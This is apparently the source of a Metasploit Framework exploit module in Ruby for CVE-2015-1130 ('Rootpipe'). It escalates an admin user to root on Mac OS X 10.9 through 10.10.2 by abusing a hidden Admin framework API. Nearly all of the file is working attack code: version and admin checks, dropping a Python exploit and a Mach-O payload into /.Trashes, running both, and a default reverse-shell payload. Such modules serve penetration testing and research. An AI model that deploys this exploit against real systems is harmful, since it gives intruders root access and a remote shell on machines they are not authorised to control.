metasploit-framework/modules/exploits/osx/local/rootpipe.rb

116 lines
3.2 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::OSX::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple OS X Rootpipe Privilege Escalation',
'Description' => %q{
This module exploits a hidden backdoor API in Apple's Admin framework on
Mac OS X to escalate privileges to root, dubbed "Rootpipe."
This module was tested on Yosemite 10.10.2 and should work on previous versions.
The patch for this issue was not backported to older releases.
Note: you must run this exploit as an admin user to escalate to root.
},
'Author' => [
'Emil Kvarnhammar', # Vulnerability discovery and PoC
'joev', # Copy/paste monkey
'wvu' # Meta copy/paste monkey
],
'References' => [
['CVE', '2015-1130'],
['OSVDB', '114114'],
['EDB', '36692'],
['URL', 'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/']
],
'DisclosureDate' => 'Apr 9 2015',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86_64,
'SessionTypes' => ['shell'],
'Privileged' => true,
'Targets' => [
['Mac OS X 10.9-10.10.2', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'osx/x64/shell_reverse_tcp',
'PrependSetreuid' => true
}
))
register_options([
OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python']),
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
])
end
def check
(ver? && admin?) ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe
end
def exploit
print_status("Writing exploit to `#{exploit_file}'")
write_file(exploit_file, python_exploit)
register_file_for_cleanup(exploit_file)
print_status("Writing payload to `#{payload_file}'")
write_file(payload_file, binary_payload)
register_file_for_cleanup(payload_file)
print_status('Executing exploit...')
cmd_exec(sploit)
print_status('Executing payload...')
cmd_exec(payload_file)
end
def ver?
Gem::Version.new(get_sysinfo['ProductVersion']).between?(
Gem::Version.new('10.9'), Gem::Version.new('10.10.2')
)
end
def admin?
cmd_exec('groups | grep -wq admin && echo true') == 'true'
end
def sploit
"#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}"
end
def python_exploit
File.read(File.join(
Msf::Config.data_directory, 'exploits', 'CVE-2015-1130', 'exploit.py'
))
end
def binary_payload
Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
end
def exploit_file
@exploit_file ||=
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
end
def payload_file
@payload_file ||=
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
end
end